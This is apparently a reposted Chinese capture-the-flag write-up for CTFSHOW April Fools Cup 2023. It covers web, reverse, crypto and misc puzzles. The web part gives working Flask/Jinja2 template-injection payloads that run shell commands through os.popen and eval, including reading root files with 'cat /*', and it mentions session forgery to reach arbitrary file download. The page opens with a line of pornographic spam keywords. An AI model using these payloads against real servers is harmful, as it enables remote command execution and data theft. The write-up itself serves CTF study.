日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

CTFSHOW愚人杯2023 部分wp

發(fā)布時間:2024/3/13 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CTFSHOW愚人杯2023 部分wp 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

web

easy_signin

url是base64編碼后的文件名
直接讀個index.php
然后查看源碼 解碼base64

easy_ssti

過濾了斜杠,不能訪問根目錄了,考慮手動拼接一個{{lipsum.__globals__.os.popen(lipsum.__globals__.__str__().__getitem__(34)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(22)~lipsum.__globals__.__str__().__getitem__(139)~lipsum.__globals__.__str__().__getitem__(288)~lipsum.__globals__.__str__().__getitem__(87)~lipsum.__globals__.__str__().__getitem__(24)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(54)).read()}}

easy_flask

session偽造
偽造成admin登錄后可以任意文件下載
下個app.py看源碼

hello路由下存在ssti
可以tplmap一把梭
手動擋payload如下
request.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /*").read()')

re

easy_pyc

反編譯得到py源碼

uncompyle6 -o a.py xxx.pyc

crypto

easy_base

簽到 解碼base64即可

misc

奇怪的壓縮包

09改00然后bandzip修復

crc爆破寬高

修改高度為300
Ocr識別得到
5oSa5Lq66lqC5b+r5LmQ77yB77yB77yB解base64可以得到類似愚人節(jié)快樂的字符串
沒什么用
Binwalk抽下圖
發(fā)現(xiàn)里面還有一個壓縮包
010打開


在最后發(fā)現(xiàn)key的base64編碼后的值,解碼得到y(tǒng)urenjie
解壓得到圖片
crc 完了ocr

琴柳感


觀察發(fā)現(xiàn)除去開頭和結尾獨立的兩句話 一共來回四句話
猜測四進制
四位一組要想能解出字母第一位必是1 因為4^3 =64
那么所有的你有沒有感受到城市在分崩離析?替換為1,另外三局遍歷替換
最終得到的四進制的字符串

120313101212130312201233131313231320122112321213120213111203121112321213132012211232121311331321122112021311132212011221132112211133132212011221122312111230122112011232132112211230122112011232120212011331

總結

以上是生活随笔為你收集整理的CTFSHOW愚人杯2023 部分wp的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。